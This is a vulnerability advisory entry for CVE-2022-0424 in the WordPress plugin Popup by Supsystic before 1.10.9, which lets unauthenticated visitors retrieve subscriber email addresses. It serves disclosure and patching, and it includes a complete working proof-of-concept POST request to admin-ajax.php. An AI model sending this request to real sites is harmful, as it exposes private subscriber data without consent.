Popup by Supsystic < 1.10.9 – Unauthenticated Subscriber Email Addresses Disclosure | CVE 2022-0424 | Plugin Vulnerabilities

Description

The plugin does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 104
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

page=subscribe&action=getListForTbl&reqType=ajax&search[text_like]=&_search=false&pl=pps&sidx=id&rows=10

Affects Plugins

popup-by-supsystic

Fixed in 1.10.9

References

CVE

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

Felipe de Avila

Submitter

Felipe de Avila

Submitter twitter

Verified

Yes

WPVDB ID

1e4593fd-51e5-43ca-a244-9aaef3804b9f

Timeline

Publicly Published

2022-04-18 (about 2 years ago)

Added

2022-04-18 (about 2 years ago)

Last Updated

2022-04-19 (about 2 years ago)

Other

Published

Title

Published

2023-12-06

Title

WP Staging (Free < 3.1.3, Pro < 5.1.3) - Unauthenticated Backup Download

Published

2022-12-27

Title

All In One WP Security & Firewall < 5.1.3 - Configuration Leak

Published

2023-06-23

Title

MainWP Child < 4.4.1.2 - Sensitive File Disclosure

Published

2024-02-20

Title

Backup Bolt < 1.4.0 - Sensitive Data Exposure

Published

2022-01-03

Title

Document Embedder < 1.7.5 - Unauthenticated Arbitrary Private/Draft Post Title Disclosure